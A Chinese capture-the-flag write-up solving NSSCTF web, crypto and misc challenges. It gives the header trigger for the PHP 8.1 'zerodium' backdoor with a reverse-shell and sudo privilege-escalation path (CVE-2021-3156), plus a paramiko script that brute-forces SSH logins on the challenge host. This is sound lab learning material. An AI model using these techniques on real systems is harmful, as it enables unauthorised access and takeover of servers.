Web
Becomeroot
首先是个php8.1的后门zerodium
在请求头里加上User-Agentt: zerodium{cmd}可以实现RCE。
直接弹shell。弹shell之后使用socat增加tty。
Shell
然后用CVE-2021-3156拿root权限即可。
Crypto
过年来下棋
棋盘密码
类型:ADFGVX,密码lucky。
年画
首先可以发现enc_c是用NSSCTF{^key得到的。所以key可以直接拿到。然后就反过来写一个解密就行了。
Python
from PIL import Imagefrom Crypto.Cipher import AESfrom Crypto.Util.Padding import *enc_c=b'&2#3-(\\x1e9*6"&$\\x02=&'flag=b"NSSCTF{"key=b""for i in range(len(enc_c)): key += bytes([enc_c[i] ^ flag[i % 7]])print("[+] Got key: ", key)w,h = Image.open("random_image.png").sizeprint(f"[+] Image size: {w}x{h}")bin_data = "".join(open("cipher.txt").readlines()).replace("\\n", "")bin_data = [int(bin_data[i:i+8],2) for i in range(0, len(bin_data), 8)]pixel_data = [bin_data[i:i+3] for i in range(0, len(bin_data), 3)]print(f"[+] Binary data pixels: {len(pixel_data)}")print("[+] Recover Pixels with RGB to cipher.png")img = Image.new("RGB", (w,h))pixels = img.load()for x in range(w): for y in range(h): pixels[x,y] = tuple(pixel_data[x*h+y])print("[+] Recover cipher.png with key and save to flag.png")pixels = img.tobytes()cipher = AES.new(key, AES.MODE_ECB)dec_pixels = cipher.decrypt(pixels)# dec_unpad = unpad(dec_pixels, AES.block_size)dec_img = Image.frombytes(img.mode, img.size, dec_pixels)dec_img.save("flag.png")print("[+] Done! Check flag.png for the flag!")Misc
温馨的酒吧
成分复杂的一道题()
反正整个交互树都看一遍就有了。
Number 7
cisco设备上的type7加密。
奇奇怪怪的原因最后两位解密不了。后来看了下发现最后两位直接是明文。
Python
from binascii import unhexlifyr = "182A1918071C152E0A4737263A3E780A6F6A075A112742777C687D0700773F7D39560063487D"r = unhexlify(r[2:])key = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"print("[+] Cipher: ",r)for salt in range(52): f = b"" for i in range(len(r[:-2])): f += bytes([r[i] ^ key[(i+salt)% len(key)]]) f += r[-2:] if b"NSSCTF" in f: print("[+] Found salt: ", salt) print("[+] Decrypted: ", f) breakusersssssssss和revenge
其实是同一个题,后面一个把wordlist加长了,flag放在.flag.txt下。(直接ls是看不到的)
直接用paramiko库写了脚本。
Python
import paramikoimport hashlibimport logginglogging.getLogger("paramiko").setLevel(logging.DEBUG)client = paramiko.SSHClient()client.set_missing_host_key_policy(paramiko.AutoAddPolicy())users = open("wl.txt").read().split("\\n")passs = [hashlib.md5(user.encode()).hexdigest() for user in users]for user, passw in zip(users, passs): try: client.connect("node2.anna.nssctf.cn",28808,username=user,password=passw) stdin, stdout, stderr = client.exec_command("ls -a") r = stdout.read().decode().split("\\n") flag = [i for i in r if "flag" in i] print(f"[*] {user} {passw} run ls with output {r}") if flag != []: print(f"[+] Found flag in user {user} with password {passw}!") stdin, stdout, stderr = client.exec_command(f"cat {flag[0]}") print(f"[+] Flag: {stdout.read().decode()}") break except Exception as e: print(f"[-] Failed with user {user} and password {passw}: {e}") pass finally: client.close()